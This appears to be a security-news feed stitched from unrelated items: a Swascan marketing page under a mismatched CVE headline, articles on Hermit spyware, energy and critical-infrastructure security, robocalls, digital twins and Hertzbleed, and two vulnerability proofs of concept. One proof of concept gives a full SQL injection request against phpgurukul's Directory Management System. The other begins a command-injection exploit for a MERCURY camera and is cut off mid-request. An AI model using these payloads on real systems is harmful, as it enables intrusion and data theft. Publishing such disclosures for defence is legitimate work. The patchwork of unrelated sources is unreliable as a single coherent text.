Proietti Tech srl Planet Time Enterprise 4.2.0.1,4.2.0.0,4.1.0.0,4.0.0.0,3.3.1.0,3.3.0.0 is vulnerable to Remote code execution via the Viewstate parameter.

**Cloud Cyber Security PlatformEuropean Cyber Research TeamThreat Intelligence PlatformThe Cyber Security Partner**

La piattaforma di Security Testing e Threat Intelligence e il Cyber Competence Center di Swascan per il Cyber Security Framework Aziendale.  
Sicurezza Predittiva. Sicurezza Preventiva. Sicurezza Proattiva.

Prova il Free Trial

**In evidenza**

**Webinar - Framework Nazionale per la Cyber Security e la Data Protection: how to**

All'interno del panorama nazionale italiano, il Framework Nazionale per la Cybersecurity e la Data Protection, rappresenta un punto di riferimento adottato da realtà fortemente eterogenee come strumento per l’organizzazione della propria strategia di difesa rispetto alle minacce informatiche.

Iscriviti

**Corso propedeutico alla certificazione CISSP**

La certificazione CISSP non è solo un riconoscimento oggettivo di eccellenza, ma uno standard riconosciuto a livello globale per i professionisti e i manager chiamati a gestire le problematiche di Cyber Security e Information Security. Registrati al corso e frequenta le lezioni a partire dal 05 settembre 2022.

Scopri di più

**Report Cyber Risk Indicators: Sanità Italiana 2022 e 2021 a confronto**

ll servizio di Cyber Risk Indicators determina e misura il potenziale rischio cyber del settore oggetto di analisi. In questa analisi abbiamo preso in esame il livello di esposizione al rischio cyber delle infrastrutture critiche italiane. Gli indicatori sono stati identificati con il servizio di Domain Threat Intelligence (DTI) e Cyber Threat Intelligence (CTI).

Scopri di più

**Cyber Security Framework**

Il Cyber Security Framework è il fondamento della postura di sicurezza della tua azienda. Un insieme di processi e tecnologie che operano all’unisono per ridurre al minimo l’esposizione al rischio cyber. Si fonda sulla sicurezza predittiva, preventiva e proattiva.

**Sicurezza Predittiva**

La Sicurezza Predittiva opera a livello di Threat Intelligence. Attraverso l’analisi di fonti OSINT e CLOSINT, a livello di Web, Dark Web e Deep Web identifica minacce, rischi e informazioni relativi all’azienda target. La Sicurezza Predittiva permette di anticipare le criticità impostando correttamente la sicurezza preventiva e proattiva.

**Sicurezza Preventiva**

La Sicurezza Preventiva agisce in termini di Analisi del Rischio tecnologico, umano e di processo. Attività che rientrano negli obblighi legislativi e in termini di best practice internazionale. Le attività fanno riferimento a penetration test, vulnerability assessment, ransomware attack simulation, phishing simulation, formazione, CIS, NIST, ISO27001, GDPR Assessment.

**Sicurezza Proattiva**

La Sicurezza Proattiva permette l’adozione degli approcci relativi alla security by detection e alla security by reaction. Attraverso l’adozione di security operation center (SOC) permette di monitorare, identificare, analizzare, gestire e bloccare eventuali minacce in essere all’interno dell’azienda. La componente incident response management garantisce la corretta gestione degli incidenti aziendali attraverso l’utilizzo di Team specializzati e competenti.

Scopri i nostri servizi

**La Piattaforma di Swascan**

Swascan è la prima suite interamente in Cloud di Security Testing e Threat Intelligence: scopri tutti i servizi disponibili ora!

Domain Threat Intelligence

Cyber Threat Intelligence

Phishing Attack Simulation

Smishing Attack Simulation

Prova il Free Trial

**Cyber Security Competence Center**

**Cyber Incident Response**

Un Cyber team dedicato di pronto intervento Cyber per la gestione di Cyber Incident, attacchi DDOS, Data Breach e Attacchi Ransomware.

**Soc as a Service**

Il servizio dedicato di Monitoring & Early Warning di Swascan per la corretta gestione della sicurezza proattiva e sicurezza preventiva.

**Penetration Test**

Le attività di Penetration Test sono svolte Penetration Tester certificati e in linea con gli standard internazionali OWASP, PTES e OSSTMM.

**GRC Management**

Servizi di Security Advisory  a livello consulenziale e a livello operativo per supportare i clienti nei piani di remediation, gestione della Cyber Security, Compliance Management e Risk Management.

**Cyber Academy**

Corsi di formazione dedicati di Cybersecurity in aula o tramite Webinar. Attività di Awareness per il personale tecnico, per i dipendenti e per i Top Manager.

**Cloud Security**

Un Cyber Competence Center dedicato al mondo Cloud per le attività di governance, supporto e tutela dell’ intero insieme di tecnologie, protocolli e best practice degli ambienti cloud computing.

**24/7 Cyber Security Operation Center**

Un team dedicato nell’attività di Sicurezza Proattiva e Reattiva delle minacce informatiche sulle reti locali, ambienti cloud, applicazioni ed endpoint aziendali. Il nostro team di Security Analyst monitora i dati e le risorse, H24, 7 giorni su 7 per 365 giorni all’anno.

Threat Detection & Analysis

Valutazione minacce e vulnerabilità

Endpoint detection and response (EDR)

Network detection response

Event Correlation / Log Management

**Penetration Testing**

Il team offensive di Swascan è certificato ISO27001 e ISO9001  
Tutte le attività rispettano gli standard OWASP, PTES e OSSTMM.

**Cyber Academy**

Nella sicurezza informatica sono indubbiamente i comportamenti umani a fare la differenza, prima ancora che la tecnologia.  
La nostra Cyber Academy offre una vasta gamma di percorsi formativi strutturati per rispondere a differenti livelli di esperienza e di specializzazione tecnica.

Scopri i nostri Corsi

**Cyber Threat Intelligence**

Il servizio di Cyber Threat Intelligence di Swascan ha lo scopo e l’obiettivo di individuare le eventuali informazioni pubbliche disponibili a livello Web, Dark Web e Deep Web relative ad un determinato target. L’attività prevede la raccolta e l’analisi delle informazioni relative ad una serie di macro aree critiche quali:

Domain Threat Intelligence

**Diventa Partner Swascan**

Scopri di più sullo Swascan Partner Program, grazie al quale i nostri partner servono al meglio i clienti, forniscono soluzioni rapide e ne promuovono la crescita.

Scopri il Partner Program

CVE-2022-30422: Home - Swascan

An enterprise-grade surveillanceware dubbed Hermit has been put to use by entities operating from within Kazakhstan, Syria, and Italy over the years since 2019, new research has revealed.
Lookout attributed the spy software, which is equipped to target both Android and iOS, to an Italian company named RCS Lab S.p.A and Tykelab Srl, a telecom services provider which it suspects to be a front

An enterprise-grade surveillanceware dubbed **Hermit** has been put to use by entities operating from within Kazakhstan, Syria, and Italy over the years since 2019, new research has revealed.

Lookout attributed the spy software, which is equipped to target both Android and iOS, to an Italian company named RCS Lab S.p.A and Tykelab Srl, a telecom services provider which it suspects to be a front company. The San Francisco-based cybersecurity firm said it detected the campaign aimed at Kazakhstan in April 2022.

Hermit is modular and comes with myriad capabilities that allow it to "exploit a rooted device, record audio and make and redirect phone calls, as well as collect data such as call logs, contacts, photos, device location and SMS messages," Lookout researchers Justin Albrecht and Paul Shunk said in a new write-up.

The spyware is believed to be distributed via SMS messages that trick users into installing what are seemingly innocuous apps from Samsung, Vivo, and Oppo, which, when opened, loads a website from the impersonated company while stealthily activating the kill chain in the background.

Like other Android malware threats, Hermit is engineered to abuse its access to accessibility services and other core components of the operating system (i.e., contacts, camera, calendar, clipboard, etc.) for most of its malicious activities.

Android devices have been at the receiving end of spyware in the past. In November 2021, the threat actor tracked as APT-C-23 (aka Arid Viper) was linked to a wave of attacks targeting Middle East users with new variants of FrozenCell.

Then last month, Google's Threat Analysis Group (TAG) disclosed that at least government-backed actors located in Egypt, Armenia, Greece, Madagascar, Côte d'Ivoire, Serbia, Spain, and Indonesia are buying Android zero-day exploits for covert surveillance campaigns.

"RCS Lab, a known developer that has been active for over three decades, operates in the same market as Pegasus developer NSO Group Technologies and Gamma Group, which created FinFisher," the researchers noted.

"Collectively branded as 'lawful intercept' companies, they claim to only sell to customers with legitimate use for surveillanceware, such as intelligence and law enforcement agencies. In reality, such tools have often been abused under the guise of national security to spy on business executives, human rights activists, journalists, academics and government officials."

The findings come as the Israel-based NSO Group is said to be reportedly in talks to sell off its Pegasus technology to U.S. defense contractor L3Harris, the company that manufactures StingRay cellular phone trackers, prompting concerns that it could open the door for law enforcement's use of the controversial hacking tool.

The German maker behind FinFisher has been courting troubles of its own in the wake of raids conducted by investigating authorities in connection with suspected violations of foreign trading laws by way of selling its spyware in Turkey without obtaining the required license.

Earlier this March, it shut down its operations and filed for insolvency, Netzpolitik and Bloomberg reported, adding, "the office has been dissolved, the employees have been laid off, and business operations have ceased."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover 'Hermit' Android Spyware Used in Kazakhstan, Syria, and Italy

The energy sector remains susceptible to both espionage between nation-states and cybercrime, and recent developments keep pointing toward more attacks.

The connected world brings people together, but connectivity also brings risk. Cybercriminals can use the same tools that bring us together to spread chaos. Every organization is concerned about cybersecurity.

During the last several years, the energy industry has been subject to high-profile attacks, including an extremely disruptive ransomware strike on Colonial Pipeline that affected fuel supplies in the US for days. While this and other high-profile attacks were the work of cybercriminals looking for a huge payday, the energy sector remains susceptible to both espionage between nation-states and cybercrime. Recent developments keep pointing toward more attacks.

The cybersecurity community needs to take global, unified action to create new rules governing and protecting the energy industry worldwide. Failure to do so will only encourage more attacks on critical, lifesaving services and hamper economic growth around the world.

**The Future Is Uncertain, but It Is Electric**

Everything from our finances to heating and communications relies on electricity. Even cybersecurity relies on electricity. I believe that when we have access to reliable energy and electricity we can create a more just, unified world.

For example, German and French leaders met in Switzerland in the aftermath of World War II to discuss creating a cross-border electrical grid between the former enemies. The wounds of war were still fresh, yet a group of determined engineers hammered out a deal that would strengthen both countries' economic recovery through resilient electrical infrastructure.

Nearly 75 years later, the need to guarantee the steady flow of electricity continues to unify people, countries, and organizations in an increasingly unstable world.

**Risks Increase as Grid Grows More Decentralized**

The necessary decentralizing of energy production infrastructures dramatically increases attack surfaces in the electrical grid, creating cybersecurity gaps and vulnerabilities. Digitization of the energy infrastructure will deliver huge value in enabling a clean energy future but poses additional cybersecurity challenges if these technologies are operated in a traditional way. For instance, these developments have created decentralized energy products like solar panels on private homes and digitized assets that were previously analog, such as substations. Meanwhile, automated systems buy and sell power and communication networks span entire transmission and distribution lines. That's millions of miles of connectivity we didn't have before.

Unfortunately, utilities and energy companies are still approaching this 21st century problem with 20th century solutions built for static, centralized, monolithic grid architecture. Today's grids are dynamic, flexible, and decentralized — requiring connectivity with numerous equipment manufacturers and preventing operators from simply digitally and physically walling off the grid. Utilities need to stop breaches from occurring, of course, but traditional perimeter defense needs to be supplemented by an approach that continuously monitors assets and network communications to identify abnormal or potentially malicious behavior. On their side, manufacturers need to deliver additional cybersecurity capabilities and also ensure interoperability for cybersecurity operations.

It's critical that we create a global consensus on supporting and protecting the electricity grid as it grows in complexity and importance. Here are three ways the world can come together to better protect electricity infrastructure.

**An Agreement to Share**

The first step would be to share information across utilities, energy companies, equipment manufacturers, and government agencies. Similar to the International Atomic Energy Agency (IAEA), a global organization should be set up to encourage transparency throughout the industry and share data and information about potential attacks, vulnerabilities, and remediation techniques.

Data connectivity between grids would be crucial, giving regulators and cybersecurity professionals access to real-time critical intelligence that could potentially prevent an attack in advance. We could set up a "black box" exchange, similar to data recording devices on commercial airlines to prevent similar attacks from occurring again. The technology already exists to enable this transparency through remote monitoring and asset management solutions that automate grid connectivity. The key would be trust. Fortunately, we have two great examples of information sharing in the nuclear energy and airline industry.

**Consensus on Cybersecurity Rules and Regulations**

Today we have a highly decentralized regulation environment with different rules around the world. For example, sign-in credential standards vary among Asia, Europe, and the US – requiring manufacturers to develop slightly different product models for each region. Standardizing regulations would streamline compliance for utilities and equipment manufacturers, strengthening asset protection while freeing up money that could then be invested in more robust cybersecurity capabilities.

**A Legal Framework for Protection**

One day, I hope we'll amend the Geneva Conventions to protect the world's energy infrastructure from cyberattacks and, in turn, protect countless lives. However, given today's political environment, such an agreement is unlikely. Instead, we'll need to look to self-governance within the industry. Utilities, equipment manufacturers, and other stakeholders will need to come together to form a strong alliance that has the power to create and enforce global cybersecurity standards. We have the technology and the will to embed cybersecurity directly into grid infrastructure, making security implicit as grids continue to grow and decentralize. The power to enact positive change is in our court.

Can We Make a Global Agreement to Halt Attacks on Our Energy Infrastructure?

The stakes are high when protecting CNI from destructive malware and other threats.

Organizations in every industry now face sophisticated, and often novel, cyber threats. But for organizations operating critical national infrastructure (CNI), the scale and multiplicity of these threats can be overwhelming. These organizations are under immense pressure to avoid downtime, maintain safety standards, and comply with government legislation, while protecting themselves from a high frequency of incisive cyberattacks.

Here's a breakdown of some of the main cybersecurity challenges facing CNI and how organizations can tackle them.

**1\. Attack Tools for Hire**

CNI organizations make particularly favorable targets for ransomware gangs, as the high cost of downtime means they are often more likely to pay a ransom in the hope of quickly restarting their systems. These organizations face the same financial pressures as other industries, but the potential social, political, and safety implications of downtime make them especially vulnerable.

When DarkSide targeted Colonial Pipeline with ransomware last year, the group received the ransom it had demanded just hours after the attack detonated. Even so, it took six days for Colonial to restore the pipeline's operations using DarkSide's IT tool, causing significant oil shortages across the East Coast of the US.

It's not just organized ransomware gangs targeting these organizations, but also individual threat actors using for-hire ransomware-as-a-service (RaaS) tools. The increasing availability of these tools means we are seeing more small-fry attackers taking on big-game targets in the hope of large payouts.

Tools reliant on threat intelligence will struggle to keep up with this dispersed threat landscape. To fight it, organizations will need to employ security approaches that account for novel threats to both their IT and OT systems.

**2\. Ransomware Groups With Nation-State Backing**

Though ransomware affects organizations in all industries, CNI organizations face the added threat of nation-state-backed groups, which cause disruption to aid government or military action and may not be looking for ransom payments at all.

Because of their government backing, these groups have the funding to quickly develop novel tools and are incredibly difficult to combat with legislation or arrests. If an attack of this nature had struck Colonial Pipeline, the time it took to bring systems back online — and the socioeconomic disruption — could have been considerably worse.

At the Royal United Services Institute, Darktrace CEO Poppy Gustafsson addressed Russia's use of cyber warfare in its invasion of Ukraine.

"The attack on the Viasat satellite that disabled Ukrainian military communications one hour before the invasion was a key component of the beginning of this war," she said. "We have seen UK, US, and EU officials jointly attribute this attack to Russia, an immensely political act. That is unprecedented."

**3\. Destructive Malware**

With cyberattacks becoming an increasingly common fixture in military arsenals, CNI organizations are recognizing the need to bolster their defenses against tenacious and well-funded attackers who are employing novel malware strains. Increasingly, that includes destructive malware.

This year the Russian invasion of Ukraine brought another CNI threat into the headlines. HermeticWiper is a disk wiper that struck several Ukrainian organizations a day prior to the invasion, fragmenting and then overwriting files on disk in an attempt to cause disruption. This is a form of destructive malware: malware that does not hold systems for ransom but is simply designed to damage them, wiping data and breaking processes. The average estimated cost of one of these incidents to a large, multinational company is $239 million.

The nature of destructive malware makes it primarily a political or military tool, and in the wake of the invasion of Ukraine, the Five Eyes intelligence alliance issued a warning regarding the heightened risk of cyberattacks. The stakes of such an attack make it paramount that organizations are prepared for novel threats, rather than relying on rules-based security systems.

**4\. Government Compliance Requirements**

The social implications of CNI shutdowns mean that these organizations receive far greater attention from governments. In recent years, legislation has often followed high-profile attacks, leaving organizations limited time to update their procedures and remain compliant. A recent of case this in the US was the Cyber Incident Reporting for Critical Infrastructure Act. The act, signed earlier this year, requires critical infrastructure operators to report cyber incidents to CISA within 72 hours, meaning reports must be hastily drawn together during the immediate aftermath of an attack.

Having advanced threat investigation technology deployed across the digital environment can help CNI operators piece together cohesive threat narratives from disparate and sometimes subtle events, reducing the time to understanding massively for security teams. Beyond meeting government deadlines, this insight into how attacks emerge and move through the network massively increases an organization's ability to detect sophisticated threats and seek out potential vulnerabilities within their systems.

**5\. Converged Infrastructures That Need Protecting**

An earlier article covered the future of IT/OT convergence and how artificial intelligence (AI) can help organizations embrace it. In brief: Deploying technology that considers IT and OT as a single environment prevents gaps in security posture and aids the detection of wide-ranging attacks.

IT/OT convergence is one of the biggest points of anxiety for security professionals in CNI organizations. Technologies such as the Industrial Internet of Things (IIoT) devices and industrial control systems as-a-service (ICSaaS) make network segmentation increasingly ineffective.

When a phishing attack can lead to OT system shutdowns — and potentially put human lives in jeopardy — security approaches need to be able to stop threats with speed and precision. AI-driven tools can make convergence a strength, using data from one set of systems to inform detections within another.

Tackling 5 Challenges Facing Critical National Infrastructure Today

Despite major progress fighting spam and scams, the roots of the problem go far deeper than your phone company’s defenses.

There's a good reason you're still afraid to answer your phone when an unknown number pops up.

For years, the telecommunications industry has been trying to curb robocalls, the frustrating and potentially dangerous spam calls that try to scam anyone who picks up the phone. But even after significant milestones in defense—including the introduction of two telecom protocols that cryptographically authenticate the source of calls—you're probably still getting spammy calls that drive you nuts. In spite of the setbacks, though, researchers say they've seen real progress on reducing spam calls in the United States, and there's potential for even more improvement. 

At the RSA Conference in San Francisco last week, Josh Bercu of the trade association USTelecom and Gary Warner, director of intelligence at the security firm DarkTower, presented findings on progress squashing robocalls and the illegal call centers they emanate from, which are predominantly located in India. And they dug into the frustrating reality that the issue is far from solved.

“I think it’s not going well at all!” Warner tells WIRED. “And people understandably wonder why the carriers don’t just block spam calls. But if you're AT&T or Verizon or T-Mobile or whoever, it’s not in your purview to decide which conversations people are allowed to have. I don’t think people want to be in that surveillance state where carriers are in a position of deciding what is an acceptable conversation for Americans to have.”

That doesn't mean the carriers haven't stepped up their blocking when they see enough evidence that a call has a suspicious provenance. But USTelecom's Bercu notes that deciding how bold to be about blocking is a delicate issue that each phone company handles differently.

“As providers have gotten more aggressive blocking or labeling suspicious calls, they've taken on more risk that they'll mis-block or mislabel a legitimate call,” he says. “Maybe it really was a call from the bank or the pharmacy. There is some delicate balancing that providers have to do, and some are more aggressive than others.”

Bercu adds, too, that different carriers work with different analytics services to identify suspicious call activity. This can create situations where, as trends in robocalling techniques evolve and spammers use different strategies to bounce calls around international networks, some analytics services may be better at catching certain behavior than others.

Bercu is also executive director of the Industry Traceback Group, a neutral entity under USTelecom designated by the Federal Communications Commission to promote intelligence-sharing to trace the source of illegal robocalls and promote collaboration between carriers. The idea is to look at how robocalls circumvent existing technical defenses, identify networks where these protections haven't been fully implemented, and work with providers to adopt stronger safeguards.

Ultimately, though, DarkTower's Warner says that as with other digital criminal industries like email spam, business email compromise, and even ransomware, the key to limiting robocalling is to make it more difficult for scammers to operate at every level of their business. This means making it harder for them to route their calls, but also harder to recruit call agents and purchase lead lists—curated collections that claim to contain the phone numbers of targets like elderly people or people with medical issues. 

It also means targeting spammers' methods for laundering money. The financial sector has already done work in this area by putting flags on potentially suspicious gift cards, but scammers have found ways around this simply by requiring that victims send them a photo of their receipt for the gift card along with the card number itself. This way they can file claims that seem to show that they legitimately purchased and own the gift card. This takes time, though, and scammers have also developed laundering techniques in which they lean on money mule networks in the US or wherever they are operating and have mules open checking accounts where victims can wire money. They then quickly move the money out of the accounts using apps like Zelle, Venmo, or Cash App.

“The key is getting more people to understand the problem who can deny infrastructure to these actors, like communication platforms, financial institutions, telecoms, everyone together,” Warner says. "Denying the ability for criminals to communicate and coordinate—I think that is probably our most actionable path forward.”

He adds, too, that while the Indian government has struggled to meaningfully address the issue, Indian law enforcement has significantly ramped up arrests related to illegal call centers. But even arresting more than a dozen people a week won't curb the problem when there are estimated to be tens of thousands of people working on illegal robocalling scams in India alone.

YouMail, the blocking company that has reported estimated robocall volumes in the US for years, found that Americans received just under 4 billion robocalls in May, down from 4.74 billion in May 2019. In general, the company's stats underscore both improvement in the total volume of robocalls and the reality that numbers are still extremely high.

“The only way we could ensure that we never get any robocalls ever would be that we don’t have phone calls at all,” USTelecom's Bercu says. “When you can receive calls, you're opening up your network to someone else. So that's why I increasingly like to think about the problem the same way you would think about other cybersecurity issues. Every provider needs to do due diligence,  and we need accountability—but also collaboration.”

Here’s Why You’re Still Stuck in Robocall Hell

Security pros can employ the technology to evaluate vulnerabilities and system capabilities, but they need to watch for the potential risks.

Digital twin technology allows for the creation of a virtual duplicate of a live production system, network environment, or cloud instance in real time — and it promises to be a rapidly growing market and boon to manufacturers and security pros alike, according to a new report from Capgemini. The benefits not only provide fallback during scheduled downtimes and improve performance through optimization, but they also aid organizations through the introduction of new business or operating models, the report, "Digital Twins: Adding Intelligence to the Real World," states.

The industry itself is still in its nascent stages, but investments are increasing. The market size for digital twins, which exceeded $5 billion in 2020, is expected to grow at more than a 35% compound annual growth rate between 2021 and 2027, Capgemini states.

Though cybersecurity is not a top driver of the technology at this time, 62% of respondents said cybersecurity and blockchain are of "importance."

Digital twins mirror a real-world system to let designers and engineers examine in realistic detail how different conditions will affect it, such as how a wind turbine might fare in a hurricane. Aside from the manufacturing and business opportunities, however, security pros can employ the technology to stress-test and otherwise evaluate the vulnerabilities and capabilities of security controls on computing environments. The ability to attack a live twin of a production environment — complete with ongoing updates reflected from the original system or environment — without putting data or productivity at risk potentially allows security teams to be as aggressive as they need to be without compromising operations. But whether data is placed at risk still seems to be a debated issue.

**Risking Data**

Capgemini cautions that security teams do not have carte blanche with digital twins. 

"An adversary affecting a digital twin or its physical counterpart can introduce divergence in the behaviors or states of the two entities," the report states. "Given the bi-directional link between the two, an attacker may negatively affect both through changes in either."  

"There are multiple areas where we have to be very careful about security with digital twins," cautions Brian Bronson, president of the Americas and APAC for Capgemini Engineering. "One of the main ones is the data capture. Because the digital twin has to do simulations with the 'in service' data, the process of capturing the data must be secure in order to protect it."

While the promise of digital twin technology for security is recognized, it might be too soon to fully implement it, says Ollie Whitehouse, global CTO at NCC Group, a research and consulting firm specializing in assessments, detection and response, compliance, and software resilience. 

"At the theoretical level, the assertion holds true," he says. "However, we are likely many decades off from digital twins being as tightly coupled as the paper implies. It's unclear as to their true value, i.e., what metricated improvement in cyber resilience an organization or product will yield if they employ digital twins."

Lisa O'Connor, cybersecurity research and development global lead at Accenture, concurs with the assertions in the Capgemini report. 

"First, all systems should be secure by design. This is no different whether we are building a production system or a digital twin of some aspect of that system," she says. 

If the digital twin is not secure by design, it could become a vector of attack.

"Changing the digital twin or the physical object's perceived behavior by intercepting and modifying the data is a known attack tactic in critical infrastructure and is common in any operational technology \[environment\]," she continues. "Such manipulations may affect the human operator or resulting analytics to make decisions on the wrong masked data. In the case where a digital twin is designed to provide direct feedback to or control of operational systems, it could directly affect those systems if not properly secured."

Nevertheless, digital twin technology has proponents who foresee its value as a cybersecurity tool. Dan Isaacs, CTO of the Digital Twin Consortium, says digital twin technology already offers security teams the ability to not only test larger environments, but also to become more granular to test more focused systems and infrastructure.

In fact, one can build a nested digital twin environment to uncover focused details related to risk, vulnerabilities, and training, as well as optimize operations. There are no silver bullets, but this is defense in-depth, Isaacs says.

**An Emerging Technology**

While Capgemini and the Digital Twin Consortium both promote the applications digital twin technology offer for very large environments, such as protecting power grids, network protection, and manufacturing, NCC's Whitehouse is still skeptical, underscoring the challenges the technology still must overcome.

"There has been some evidence that digital twins are possible in small-scale systems, but they have not been shown to scale to our knowledge," Whitehouse says. "There are numerous variables affecting how one can fully implement cyber-physical, complex business processes, and supply chains in a digital-twinned environment. Digital twins are an emerging concept going through rapid evolution."  

But, he cautions, "they are not prime for mass adoption today outside of the very specialized, and especially when looking at cyber resilience challenges. Often-imperfect data and insight into the physical system today coupled with cost constraints means watered-down realities exist. Digital twins are a vision of what might be — but the reality today is often very different when we look at implementation."

Capgemini's Bronson agrees that digital twin technology is at "the beginning of the journey."

"One of the main attention points is to understand that a digital twin is not a 'photo' at one point in time," he says. "We have to think of the full life cycle of the real object that we want to replicate — from the design to the end of life to recycling."

A digital twin is a database that contains sensitive information, warns Accenture's O'Connor. "Protecting the digital twin itself is as important as protecting the system it analyzes," she says.

Unlocking the Cybersecurity Benefits of Digital Twins

Directory Management System v1.0 was discovered to contain a SQL injection vulnerability via the fullname parameter in add-directory.php.

\> \[Suggested description\]

\> Directory Management System v1.0 was discovered to contain a SQL

\> injection vulnerability via the fullname parameter in

\> add-directory.php.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> SQL Injection

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> phpgurukul

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Directory Management System - 1.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> add-directory.php

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Remote

\>

\> ------------------------------------------

\>

\> \[Impact Information Disclosure\]

\> true

\>

\> ------------------------------------------

\>

\> \[Attack Vectors\]

\> POST /dms/admin/add-directory.php HTTP/1.1

\> Host: ip

\> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0

\> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

\> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

\> Accept-Encoding: gzip, deflate

\> Content-Type: application/x-www-form-urlencoded

\> Content-Length: 178

\> Connection: close

\> Cookie: PHPSESSID=eml4bgiglhno5kgmjj8uld5qgs

\> Upgrade-Insecure-Requests: 1

\>

\> fullname=database()','$profession','$email','$mobilenumber','$address',database(),'$admsta')%23&profession=aaaa&email=aaa%40aaa.aaa&mobilenumber=aaa&city=aaa&address=aaaa&submit=

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> laotun

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> http://directory.com

\> http://phpgurukul.com

Use CVE-2022-31384.

CVE-2022-31384: POC/CVE-2022-31384.txt at main · laotun-s/POC

Hertzbleed is a new side-channel attack that can recover sensitive information from a targeted system by applying CPU timing.
The post Hertzbleed exposes computers’ secret whispers appeared first on Malwarebytes Labs.

Hertzbleed is the name for a vulnerability that can be used to obtain cryptographic keys and other secret data from Intel and AMD CPUs, remotely. It works by monitoring changes in power consumption, which can be deduced by the careful timing of known workloads, thanks to a processor power saving feature called dynamic voltage and frequency scaling (DVFS).

**A remote DVFS side channel**

DVFS describes the adjustment of power and speed settings on a computer’s various processors, controller chips, and peripheral devices. By throttling the speed of the chips, DVFS can prolong battery life and reduce cooling costs.

When CPUs process data, transistors are switched on and off depending on the data being processed. Switching transistors uses energy. Consequently, running the same workload with different data may change the CPU’s power consumption.

Those differences trigger changes in the frequency set by DVFS. Which means the same program will run at a different frequency if the input is different—even if it is just slightly different. Those frequency changes can be deduced by monitoring the time it takes for a server to respond to specific, carefully made queries.

This allows an attacker with a stopwatch and enough datapoints to perform a “side-channel” attack and infer the data the CPU was processing. (A side-channel attack is an attack based on information that can be observed because of the way a computer protocol or algorithm is implemented.)

**Vulnerability or feature?**

DVFS is a useful feature of modern processors. But like some other useful features of modern processors, it turns out to have a security downside. In this case, the downside has been assigned two CVEs:

*   CVE-2022-23823: A potential vulnerability in some AMD processors using frequency scaling may allow an authenticated attacker to execute a timing attack to potentially enable information disclosure.
*   CVE-2022-24436: Observable behavioral in power management throttling for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via network access.

Hertzbleed affects all Intel and several AMD processors. Other processor vendors which also implement frequency scaling in their products may be affected.

**Should I worry?**

As with many threats, the risk you are running very much depends on your threat model. If you are working with highly confidential data, and there is reason to believe that advanced threat actors might be after that data, then you may have a reason to worry about it. For anyone else, it’s something to be aware of, but not necessarily something you need to act upon.

It is a known fact that threat actors can extract secret cryptographic data from a chip by measuring the power it consumes while processing cryptographic keys and other secret data. But the means for exploiting power-analysis attacks against microprocessors has always been limited because the threat actors had few viable ways to remotely measure power consumption while processing the secret material.

Hertzbleed reduces the requirements. Making power side-channel attacks into timing attacks that can be done remotely. But it will still take many hours and some level of proximity to recover a full cryptographic key. For example, the proof-of-concept attack took 36 to 89 hours to recover a full secret key from a system on the same network.

Most cybercriminals aren’t going to bother with Hertzbleed and will continue to rely on phishing, Word macros, skimmers, and other well worn tricks, but that doesn’t mean that advanced, well-resourced threat actors won’t.

According to Intel, who held the research results under embargo but decided not to deploy any patches:

> “While this issue is interesting from a research perspective, we do not believe this attack to be practical outside of a lab environment.”

**Mitigation**

There are ways to disable the features that make Hertzbleed possible, but it will come at a price: Your system will be considerably slower. You would have to disable what Intel calls “Turbo Boost”, and AMD calls “Turbo Core” or “Precision Boost”. For more information, you can read the official security advisories by Intel and AMD.

The preferable way to mitigate is to deal with the vulnerability in the code of programs that handle cryptographic ciphers and other confidential data. Hertzbleed shows that current industry guidelines for how to write constant-time code (such as Intel’s) are insufficient to guarantee constant-time execution on modern processors. So improvements in that field will be necessary.

Stay safe, everyone!

Hertzbleed exposes computers’ secret whispers

MERCURY MIPC451-4 1.0.22 Build 220105 Rel.55642n was discovered to contain a remote code execution (RCE) vulnerability which is exploitable via a crafted POST request.

**MERCURY MIPC451-4 command\_execution**

**CVE ID**:

**Vender**: MERCURY

**Vendor Homepage**: https://www.mercurycom.com.cn/

**Affect products**: MIPC451-4

**Firmware version**: 1.0.22 Build 220105 Rel.55642n

**Hardware Link**: https://service.mercurycom.com.cn/download/202109/MIPC451-4%20V2.0%E5%8D%87%E7%BA%A7%E8%BD%AF%E4%BB%B620210414\_1.0.6.zip

**Exploit Author**: SkYe231@Hillstone

**describe**

The Mercury MIPC451-4 has remote command execution, and remote attackers can bypass restrictions through carefully constructed packets to achieve remote command execution.

**detail**

Taking the mailbox name as the core filtering rule of username, the rules only filter the mailbox format (see the code comments for details), and do not filter special symbols, so there is a chance of injection.

> file:/usr/bin/dsd

/\* expect return value 1 \*/

int FUN\_00024aa4(byte \*param\_1)

{
  size\_t sVar1;
  char \*pcVar2;
  int iVar3;
  
                    /\* username is empty \*/
  if (param\_1 == (byte \*)0x0) {
    return 0;
  }
                    /\* length is 0 \*/
  sVar1 = strlen((char \*)param\_1);
  if (sVar1 == 0) {
    return 0;
  }
                    /\* Limit length<129 \*/
  if ((int)sVar1 < 129) {
                    /\* matches @ \*/
    pcVar2 = strchr((char \*)param\_1,L'@');
                    /\* no matches \*/
    if (pcVar2 == (char \*)0x0) {
      return 0;
    }
                    /\* Does it end with @ \*/
    if (param\_1\[sVar1 - 1\] != 0x40) {
                    /\* Does it start with @ \*/
      iVar3 = \*param\_1 - 0x40;
      if (iVar3 != 0) {
        iVar3 = 1;
      }
      return iVar3;
    }
  }
  return 0;
}

**EXP**

1.  Log in to the background to get **stok** (cookie)
    
        POST / HTTP/1.1
        Host: 192.168.0.103
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
        Accept: application/json, text/javascript, */*; q=0.01
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Content-Type: application/json; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Content-Length: 73
